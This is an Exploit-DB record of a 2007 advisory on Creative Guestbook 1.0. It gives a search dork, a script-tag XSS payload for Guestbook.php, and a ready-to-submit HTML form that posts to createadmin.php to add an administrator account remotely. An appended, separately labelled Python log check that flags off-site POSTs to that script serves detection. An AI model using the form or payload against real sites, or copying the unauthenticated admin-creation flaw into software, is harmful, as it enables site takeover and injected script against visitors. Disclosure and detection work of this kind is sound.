Vendor: Creative Guestbook 1.0
By: Dj7xpl
CVSS: N/A
Add Remote Admin User, Cross Site Scripting
Product Name: Creative Guestbook 1.0
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Creative Guestbook 1.0 Add Remote Admin User and Cross Site Scripting Vulnerability

Creative Guestbook 1.0 has two issues: an attacker can add an admin user remotely, and the guestbook is vulnerable to cross-site scripting. The portal can be downloaded from http://www.thecreativeheads.de/CreativeFiles/downloads.php. The admin user is added by posting a form with Name, Email and PASSWORD fields to createadmin.php. The cross-site scripting is triggered by inserting script markup through Guestbook.php; the example given is <script> alert (' dj7xpl ^_^ ') </script>.

Mitigation:

Unknown
Source

Exploit-DB raw data:

                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   Creative Guestbook 1.0
#   Download   :   http://www.thecreativeheads.de/CreativeFiles/downloads.php
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Dork       :   "Creative Guestbook"
#   Class      :   (Add Remote Admin User)   And   (Cross Site Scripting)
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   css/xss :
#              http://[Target]/[Path]/Guestbook.php   <== Insert Your Script
#              Example : <script> alert ('  dj7xpl ^_^  ') </script>
#
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   Add Remote Admin User :
#	
#	<form name="admin" method="post" action="http://[target]/[path]/createadmin.php?PHPSESSID='.session_id().'">
#       <input type="text" name="Name" value="name"><br>
#       <input type="text" name="Email" value="email"><br>
#       <input type="text" name="PASSWORD" value="password"><br>
#       <input type="submit" value="Admin hinzuf&uuml;gen" name="submit">
#   </form>
#	
#	
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-15]
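
Added example, not part of the original advisory or of the Exploit-DB record: a log check a site operator could run to review admin-creation requests. The form in the record is hosted outside the guestbook and posts to createadmin.php, so the sketch flags POSTs to that script whose Referer is absent or names another host. The Combined Log Format, the host guestbook.example, the page admin.php and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Combined Log Format (assumed): ip - user [time] "METHOD path PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def suspicious_admin_creates(lines, site_host):
    """Return (ip, time, reason) for POSTs to createadmin.php that did not
    originate from a page on site_host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        # Compare the script name only; the request may carry ?PHPSESSID=...
        script = urlsplit(m["path"]).path.rsplit("/", 1)[-1].lower()
        if script != "createadmin.php":
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            reason = "no Referer"
        else:
            host = (urlsplit(referer).hostname or "").lower()
            if host == site_host.lower():
                continue  # submitted from a page on the site itself
            reason = "off-site Referer: " + (host or "unparseable")
        hits.append((m["ip"], m["time"], reason))
    return hits

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Mar/2007:10:01:00 +0000] "GET /gb/Guestbook.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [15/Mar/2007:10:02:11 +0000] "POST /gb/createadmin.php?PHPSESSID=abc HTTP/1.1" 200 310 "http://guestbook.example/gb/admin.php" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Mar/2007:10:05:42 +0000] "POST /gb/createadmin.php?PHPSESSID= HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Mar/2007:10:09:03 +0000] "POST /gb/CreateAdmin.php HTTP/1.1" 200 310 "http://other.example/form.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_admin_creates(SAMPLE_LOG, "guestbook.example"):
        print(hit)
```

The Referer header is set by the client and can be omitted or forged, so a hit is a prompt to compare the admin user list against known accounts, not proof either way.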